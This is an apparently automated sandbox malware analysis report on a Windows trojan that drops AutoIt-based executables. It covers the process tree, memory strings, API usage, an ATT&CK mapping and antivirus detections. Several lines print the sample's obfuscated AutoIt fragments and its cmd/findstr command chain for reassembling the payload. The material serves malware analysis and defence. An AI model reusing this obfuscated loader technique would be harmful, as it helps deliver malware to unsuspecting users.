Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1692968610.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1693180464.0000000000E43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $mUnGEjvcQyyHiw = Execute(rETgxIUQ("88#121#119#110#115#108#78#120#75#113#116#102#121#45#44#111#109#115#90#105#88#108#103#112#89#114#70#106#103#44#46",5)), $oMLzKVgHrLiAtG = 'kImZXeDRqjFLvNVshxWmCEEFWYFxpoalRvHQqemUF'
Source: Inebriarti.exe.com, 00000005.00000003.1748045980.00000000039F3000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000008.00000002.2926448957.00000000041AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UGEkkLaFjAXjVGXLQawHGZdbjwhEqMURhOrQFTVBwhgFsuRRJifZsK
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp, Tt843YGUx5.exe, 00000000.00000003.1680799306.0000000003850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: $VjItThBcFgJSTh = Execute(ekrSXFezU("71#117#108#121#104#74#104#119#86#104#117#108#100#111#43#42#92#122#80#120#74#102#88#111#93#42#44",3)), $LHtIufRxUd = 'rAAViyZFlUnFeoHWSZCenyXOWRCUyyhgfSUBjlm'
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711066834.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1696988883.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1696668926.0000000000C84000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1695659728.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711553711.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1708881008.0000000000CD6000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711228480.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1711402478.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, Bonta.exe.com, 00000007.00000003.1714793493.0000000000D84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $DxgKjzXtlDLONYMZ = 'VNswdqkJHGRvmueigEoCbcbzzRZsYHefjSEKYHhxeqEMuIKbJG'
Source: Inebriarti.exe.com, 00000008.00000002.2925428546.0000000003EA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kImZXeDRqjFLvNVshxWmCEEFWYFxpoalRvHQqemUF118#109#119#1
Source: Inebriarti.exe.com, 00000008.00000002.2923702335.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $mUnGEjvcQyyHiw = Execute(rETgxIUQ("88#121#119#110#115#108#78#120#75#113#116#102#121#45#44#111#109#115#90#105#88#108#103#112#89#114#70#106#103#44#46",5)), $oMLzKVgHrLiAtG = 'kImZXeDRqjFLvNVshxWmCEEFWYFxpoalRvHQqemUF'q
Source: Inebriarti.exe.com, 00000008.00000002.2924070634.000000000154E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: For $lDMfBZXyYdklEnPNzTqemusNJakRrSoysInesZUWmdfquUcTLKIzvBh = 18 To 390^X
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1711244049.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1706584861.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1692968610.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1709948771.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1711027703.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1705873109.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1707770480.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1710380764.0000000000F79000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1711155587.0000000000FAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: For $lDMfBZXyYdklEnPNzTqemusNJakRrSoysInesZUWmdfquUcTLKIzvBh = 18 To 39
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp, Tt843YGUx5.exe, 00000000.00000003.1680799306.0000000003850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: $FtFgHgfSLDQHNz = $FtFgHgfSLDQHNz + 1
Source: Bonta.exe.com, 0000000A.00000002.2926371266.0000000003AB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Inebriarti.exe.com, 00000005.00000003.1706584861.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1692968610.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1709948771.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1710670447.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1705873109.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1710792928.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1707770480.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1706721244.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1693180464.0000000000E43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $xTAygaMnGSysza = 'UGEkkLaFjAXjVGXLQawHGZdbjwhEqMURhOrQFTVBwhgFsuRRJifZsK'N
Source: Inebriarti.exe.com, 00000008.00000002.2927741205.0000000004773000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
Source: Bonta.exe.com, 0000000A.00000002.2925494466.0000000003840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VNswdqkJHGRvmueigEoCbcbzzRZsYHefjSEKYHhxeqEMuIKbJGX
Source: Inebriarti.exe.com, 00000005.00000003.1706584861.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1692968610.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1709948771.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1710670447.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1705873109.0000000000EB7000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1707770480.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1706721244.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000003.1693180464.0000000000E43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $puvSDtqYrsfhEL = 'RPPoXblPCCcjAMnWzIKfyWHmssVRhgFSwWmgXhfRYsTdoRmjEcVFUc''
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Switch $FtFgHgfSLDQHNz
Source: Tt843YGUx5.exe, 00000000.00000002.2108031796.000000000051E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d-^
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000008.00000002.2923997739.00000000014EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $xTAygaMnGSysza = 'UGEkkLaFjAXjVGXLQawHGZdbjwhEqMURhOrQFTVBwhgFsuRRJifZsK'
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $FtFgHgfSLDQHNz = 195
Source: Inebriarti.exe.com, 00000008.00000002.2923997739.00000000014EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $puvSDtqYrsfhEL = 'RPPoXblPCCcjAMnWzIKfyWHmssVRhgFSwWmgXhfRYsTdoRmjEcVFUc'V'r
Source: Inebriarti.exe.com, 00000005.00000003.1746199416.0000000003B61000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000008.00000002.2926882914.0000000004310000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LDMFBZXYYDKLENPNZTQEMUSNJAKRRSOYSINESZUWMDFQUUCTLKIZVBH
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007D45D5 BlockInput,5_2_007D45D5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00775240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00775240
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00795CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_00795CAC
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040760A LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,0_2_0040760A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007B88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_007B88CD
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078A354 SetUnhandledExceptionFilter,5_2_0078A354
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0078A385
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00A7A385
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7A354 SetUnhandledExceptionFilter,7_2_00A7A354
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003FA354 SetUnhandledExceptionFilter,11_2_003FA354
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003FA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_003FA385
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007B9369 LogonUserW,5_2_007B9369
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_00775240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00775240
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C1AC6 SendInput,keybd_event,5_2_007C1AC6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007C51E2 mouse_event,5_2_007C51E2
Source: C:\Users\user\Desktop\Tt843YGUx5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Seminato.vstmJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmdJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com Inebriarti.exe.com AJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com Bonta.exe.com mJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com Pensiero.exe.com EJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007B88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_007B88CD
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_0040287D AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040287D
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030CB000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000000.1685402000.0000000000816000.00000002.00000001.01000000.00000005.sdmp, Bonta.exe.com, 00000007.00000000.1686613915.0000000000B06000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Inebriarti.exe.com, Bonta.exe.com, Pensiero.exe.comBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0078885B cpuid 5_2_0078885B
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_004025C8
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00401899 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401899
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007A0722 GetUserNameW,5_2_007A0722
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_0079416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_0079416A
Source: C:\Users\user\Desktop\Tt843YGUx5.exeCode function: 0_2_00405420 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,GetCommandLineW,lstrlenW,GetCommandLineW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405420
Source: Pensiero.exe.comBinary or memory string: WIN_81
Source: Pensiero.exe.comBinary or memory string: WIN_XP
Source: Pensiero.exe.comBinary or memory string: WIN_XPe
Source: Pensiero.exe.comBinary or memory string: WIN_VISTA
Source: Pensiero.exe.comBinary or memory string: WIN_7
Source: Pensiero.exe.comBinary or memory string: WIN_8
Source: Bonta.exe.com, 0000000A.00000000.1689082759.0000000000B06000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007D696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_007D696E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.comCode function: 5_2_007D6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_007D6E32
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AC696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,7_2_00AC696E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AC6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,7_2_00AC6E32
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_0044696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_0044696E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_00446E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00446E32

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure2
Valid Accounts		2
Native API		1
DLL Side-Loading		1
Exploitation for Privilege Escalation		1
Disable or Modify Tools		121
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter		2
Valid Accounts		1
DLL Side-Loading		11
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol121
Input Capture		1
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
Valid Accounts		2
Obfuscated Files or Information		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares3
Clipboard Data		1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
Access Token Manipulation		1
DLL Side-Loading		NTDS25
System Information Discovery		Distributed Component Object ModelInput Capture1
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection		1
Masquerading		LSA Secrets31
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
Valid Accounts		Cached Domain Credentials2
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Access Token Manipulation		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
Process Injection		Proc Filesystem1
System Owner/User Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
Remote System Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
System Network Configuration Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1610406 Sample: Tt843YGUx5.exe Startdate: 09/02/2025 Architecture: WINDOWS Score: 80 43 OreSqbuLLIH.OreSqbuLLIH 2->43 45 OEEMOUIIEJHDT.OEEMOUIIEJHDT 2->45 47 NiXfPuxauHolCHyB.NiXfPuxauHolCHyB 2->47 55 Antivirus / Scanner detection for submitted sample 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Joe Sandbox ML detected suspicious sample 2->59 10 Tt843YGUx5.exe 11 2->10         started        signatures3 process4 signatures5 61 Contains functionality to register a low level keyboard hook 10->61 13 cmd.exe 1 10->13         started        process6 signatures7 63 Obfuscated command line found 13->63 65 Uses ping.exe to sleep 13->65 67 Drops PE files with a suspicious file extension 13->67 69 Uses ping.exe to check the status of other devices and networks 13->69 16 cmd.exe 7 13->16         started        20 conhost.exe 13->20         started        process8 file9 37 C:\Users\user\AppData\...\Pensiero.exe.com, PE32 16->37 dropped 39 C:\Users\user\AppData\...\Inebriarti.exe.com, PE32 16->39 dropped 41 C:\Users\user\AppData\Local\...\Bonta.exe.com, PE32 16->41 dropped 51 Obfuscated command line found 16->51 53 Uses ping.exe to sleep 16->53 22 PING.EXE 1 16->22         started        25 Inebriarti.exe.com 16->25         started        27 Pensiero.exe.com 16->27         started        29 4 other processes 16->29 signatures10 process11 dnsIp12 49 127.0.0.1 unknown unknown 22->49 31 Inebriarti.exe.com 25->31         started        33 Pensiero.exe.com 27->33         started        35 Bonta.exe.com 29->35         started        process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Tt843YGUx5.exe31%VirustotalBrowse
Tt843YGUx5.exe45%ReversingLabsWin32.Trojan.Generic
Tt843YGUx5.exe100%AviraTR/Patched.Gen

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com3%ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com3%ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com3%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
OEEMOUIIEJHDT.OEEMOUIIEJHDT
unknown
unknownfalse
    		unknown
    OreSqbuLLIH.OreSqbuLLIH
    		unknown
    		unknownfalse
      		unknown
      NiXfPuxauHolCHyB.NiXfPuxauHolCHyB
      		unknown
      		unknownfalse
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.autoitscript.com/autoit3/JTt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp, Inebriarti.exe.com, 00000005.00000000.1685542446.0000000000829000.00000002.00000001.01000000.00000005.sdmp, Bonta.exe.com, 00000007.00000002.1753768535.0000000000B19000.00000002.00000001.01000000.00000006.sdmp, Inebriarti.exe.com, 00000008.00000002.2923052469.0000000000829000.00000002.00000001.01000000.00000005.sdmp, Bonta.exe.com, 0000000A.00000000.1689206168.0000000000B19000.00000002.00000001.01000000.00000006.sdmpfalse
          		high
          https://www.autoitscript.com/autoit3/Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmpfalse
            		high

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious

            Private

            IP
            127.0.0.1

            General Information

            Joe Sandbox version:42.0.0 Malachite
            Analysis ID:1610406
            Start date and time:2025-02-09 07:58:13 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 20s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
